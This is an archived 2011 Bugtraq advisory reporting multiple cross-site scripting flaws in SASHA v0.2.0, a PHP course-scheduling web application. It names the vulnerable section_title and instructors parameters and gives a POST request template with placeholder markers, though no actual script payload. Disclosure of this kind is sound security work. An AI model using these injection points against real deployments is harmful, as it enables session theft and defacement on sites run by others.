[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
SASHA v0.2.0 Mutiple XSS
- To: <submit@xxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: SASHA v0.2.0 Mutiple XSS
- From: tom <tom@xxxxxxxxxx>
- Date: Sun, 18 Dec 2011 14:08:19 -0500
# Exploit Title: SASHA v0.2.0 Mutiple XSS
# Date: 12/16/11
# Author: G13
# Software Link: http://sourceforge.net/projects/sasha/files/
# Version: 0.2.0
# Category: webapps (php)
#
##### Vulnerability #####
When adding a new course to the schedule, the application relies on
Client Side controls for input. This can easily be bypassed by using an
intercepting proxy or CSRF attack.
##### Affected Variables #####
section_title=[XSS]
instructors=[XSS]
##### POST Data #####
institution=uvm&semester%5Bseason%5D=09&semester%5Byear%5D=2011&schedule_type=0&
subject=math&course=0028§ion=test&start_time%5Bhour%5D=8&
start_time%5Bminute%5D=0&start_time%5Bmeridiem%5D=AM&end_time%5Bhour%5D=9&
end_time%5Bminute%5D=0&end_time%5Bmeridiem%5D=AM&parent_schedule_id=&
instructors%5B0%5D=&instructors%5B1%5D=&instructors%5B2%5D=&instructors%5B3%5D=&
instructors%5B4%5D=&instructors%5B5%5D=§ion_title=&step=1&next=Next